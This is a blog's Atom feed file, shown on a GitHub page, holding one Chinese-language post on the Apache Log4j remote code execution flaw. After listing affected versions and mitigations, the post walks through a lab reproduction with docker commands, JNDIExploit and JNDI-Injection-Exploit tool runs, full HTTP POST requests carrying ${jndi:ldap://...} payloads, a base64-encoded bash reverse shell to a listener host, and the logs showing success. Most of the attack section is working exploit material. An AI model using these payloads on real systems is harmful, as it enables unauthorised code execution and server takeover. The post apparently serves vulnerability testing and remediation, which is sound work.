-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathatom.xml
More file actions
132 lines (130 loc) · 7.54 KB
/
atom.xml
File metadata and controls
132 lines (130 loc) · 7.54 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<id>https://infinity.ver0x1e.top</id>
<title>Verinfinity's blog | security_dog</title>
<updated>2021-12-21T08:30:46.312Z</updated>
<generator>https://github.com/jpmonette/feed</generator>
<link rel="alternate" href="https://infinity.ver0x1e.top"/>
<link rel="self" href="https://infinity.ver0x1e.top/atom.xml"/>
<subtitle>一只安全狗,混迹于安全圈,摸鱼写写blog</subtitle>
<logo>https://infinity.ver0x1e.top/images/avatar.png</logo>
<icon>https://infinity.ver0x1e.top/favicon.ico</icon>
<rights>All rights reserved 2021, Verinfinity's blog | security_dog</rights>
<entry>
<title type="html"><![CDATA[apache log4j远程代码执行]]></title>
<id>https://infinity.ver0x1e.top/post/apache-log4j-yuan-cheng-dai-ma-zhi-xing/</id>
<link href="https://infinity.ver0x1e.top/post/apache-log4j-yuan-cheng-dai-ma-zhi-xing/">
</link>
<updated>2021-12-21T08:21:56.000Z</updated>
<content type="html"><![CDATA[<h2 id="漏洞类型">漏洞类型</h2>
<p>远程代码执行</p>
<h2 id="漏洞名称">漏洞名称</h2>
<p>apache log4j远程代码执行</p>
<h2 id="安全等级">安全等级</h2>
<p>高</p>
<h2 id="漏洞描述">漏洞描述</h2>
<p>Apache Log4j2是一款Java日志框架,是Log4j 的升级版。可以控制每一条日志的输出格式。通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该漏洞是由于Apache Log4j2某些功能存在递归解析功能,攻击者可利用该漏洞在未授权的情况下,构造恶意数据进行远程代码执行攻击,最终获取服务器最高权限。</p>
<h2 id="影响范围">影响范围</h2>
<p>漏洞影响版本:2.0 <= Apache Log4j 2 <= 2.15.0-rc2</p>
<h2 id="修复建议方案">修复建议方案</h2>
<p>紧急:目前漏洞POC已被公开,官方已发布安全版本,建议使用该组件的用户尽快采取安全措施。</p>
<p>处置:</p>
<p>1、 升级Apache Log4j 2至最新安全版本,下载地址:</p>
<p>https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2</p>
<p>缓解措施:</p>
<p>1、jvm参数 -Dlog4j2.formatMsgNoLookups=true</p>
<p>2、log4j2.formatMsgNoLookups=True</p>
<h2 id="要求内容">要求内容</h2>
<p>执行命令</p>
<h1 id="测试方法">测试方法</h1>
<p>手动测试</p>
<h2 id="测试示例">测试示例</h2>
<h3 id="示例一">示例一:</h3>
<p>环境搭建</p>
<pre><code class="language-shell">docker pull registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln
docker run -it -d -p 8080:8080 --name log4j_vuln_container registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln
docker exec -it log4j_vuln_container /bin/bash
/bin/bash /home/apache-tomcat-8.5.45/bin/startup.sh
</code></pre>
<p>http://127.0.0.1/webstudy/hello-fengxuan,post参数为c</p>
<p>起一台服务器,虚拟机复现的话使用虚拟机,使用工具https://github.com/feihong-cs/JNDIExploit 启动ldap服务</p>
<pre><code class="language-shell">[root@localhost JNDIExploit.v1.2]# java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.52.135
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8080...
</code></pre>
<p>然后使用burpsuite发送请求,payload中的ip为起了ldap服务的主机,base64后面为base64加密的命令,touch /tmp/123</p>
<pre><code>POST /webstudy/hello-fengxuan HTTP/1.1
Host: 192.168.52.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.52.130:8080/webstudy/hello-fengxuan
Content-Type: application/x-www-form-urlencoded
Content-Length: 78
Origin: http://192.168.52.130:8080
Connection: close
Cookie: PHPSESSID=kk43e5f3u4nk4ghhlpjmv7a2h3; security=impossible
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
c=${jndi:ldap://192.168.52.135:1389/Basic/Command/base64/dG91Y2ggL3RtcC8xMjM=}
</code></pre>
<p>然后发送请求,发现vps显示执行成功.</p>
<pre><code class="language-shell">root@localhost JNDIExploit.v1.2]# java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.52.135
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8080...
[+] Received LDAP Query: Basic/Command/base64/dG91Y2ggL3RtcC8xMjM=
[+] Paylaod: command
[+] Command: touch /tmp/123
[+] Sending LDAP ResourceRef result for Basic/Command/base64/dG91Y2ggL3RtcC8xMjM= with basic remote reference payload
[+] Send LDAP reference result for Basic/Command/base64/dG91Y2ggL3RtcC8xMjM= redirecting to http://192.168.52.135:8080/ExploitI6LCaJskwj.class
[+] New HTTP Request From /192.168.52.130:48138 /ExploitI6LCaJskwj.class
[+] Receive ClassRequest: ExploitI6LCaJskwj.class
[+] Response Code: 200
</code></pre>
<p>去主机上看发现执行成功</p>
<pre><code class="language-shell">[root@95bf5c2d67f5 tmp]# ls
123 hsperfdata_root ks-script-LRoSA2 yum.log
</code></pre>
<p>反弹shell,使用的工具不一样使用https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0 这个工具,更加安全</p>
<p>在vps上启动一个服务跟上反弹shell命令bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjUyLjEzNS84OTkwIDA+JjE=}|{base64,-d}|{bash,-i} -A "xxx.xxx.xxx(vps ip)",其中中间的base64加密是反弹shell命令bash -i >& /dev/tcp/192.168.52.135/8990 0>&1</p>
<pre><code class="language-shell">[root@localhost JNDIExploit.v1.2]# java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjUyLjEzNS84OTkwIDA+JjE=}|{base64,-d}|{bash,-i}" -A "192.168.52.135"
[ADDRESS] >> 192.168.52.135
[COMMAND] >> bash -i >& /dev/tcp/192.168.52.135/8990 0>&1
----------------------------JNDI Links----------------------------
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://192.168.52.135:1099/3ussmu
ldap://192.168.52.135:1389/3ussmu
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://192.168.52.135:1099/uzznko
ldap://192.168.52.135:1389/uzznko
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://192.168.52.135:1099/ka0yok
----------------------------Server Log----------------------------
2021-12-12 05:04:13 [JETTYSERVER]>> Listening on 0.0.0.0:8180
2021-12-12 05:04:13 [RMISERVER] >> Listening on 0.0.0.0:1099
2021-12-12 05:04:14 [LDAPSERVER] >> Listening on 0.0.0.0:1389
</code></pre>
<p>然后在vps上启动监听</p>
<p>nc -lvvp xxxx</p>
<p>然后post请求数据</p>
<p>POST /webstudy/hello-fengxuan HTTP/1.1<br>
Host: 192.168.52.130:8080<br>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0<br>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,<em>/</em>;q=0.8<br>
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2<br>
Accept-Encoding: gzip, deflate<br>
Referer: http://192.168.52.130:8080/webstudy/hello-fengxuan<br>
Content-Type: application/x-www-form-urlencoded<br>
Content-Length: 43<br>
Origin: http://192.168.52.130:8080<br>
Connection: close<br>
Cookie: PHPSESSID=kk43e5f3u4nk4ghhlpjmv7a2h3; security=impossible<br>
Upgrade-Insecure-Requests: 1<br>
Pragma: no-cache<br>
Cache-Control: no-cache</p>
<p>c=${jndi:ldap://192.168.52.135:1389/uzznko}</p>
]]></content>
</entry>
</feed>